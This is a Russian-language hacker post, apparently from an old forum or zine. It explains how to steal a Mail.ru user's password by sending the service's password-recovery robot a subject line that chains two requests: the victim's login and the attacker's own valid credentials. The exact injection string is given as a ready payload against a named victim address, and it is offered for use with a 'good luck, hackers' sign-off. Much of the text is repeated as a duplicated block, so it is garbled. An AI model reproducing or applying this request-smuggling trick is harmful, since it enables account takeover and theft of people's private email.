Взлом почты на Mail.ru Всё очень просто. По адресу web-passwd@mail.ru сидит mail-робот, который
анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу
шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со
специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся
будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем
два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем
)
Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на web-passwd@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они
правильные!
login=hacker&pass=qwerty&answer=
Итого: тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!! (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы
разделяются точкой с запятой. Удачи кул хацкеры)
анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу
шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со
специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся
будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем
два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем
) Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на web-passwd@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они
правильные!
login=hacker&pass=qwerty&answer=
Итого: тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!! (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы
разделяются точкой с запятой. Удачи кул хацкеры)
А то этих гоблинов сейчас развелось....
